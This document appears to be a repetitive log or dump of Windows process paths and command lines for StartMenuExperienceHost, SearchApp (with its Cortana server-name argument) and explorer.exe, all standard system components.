"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

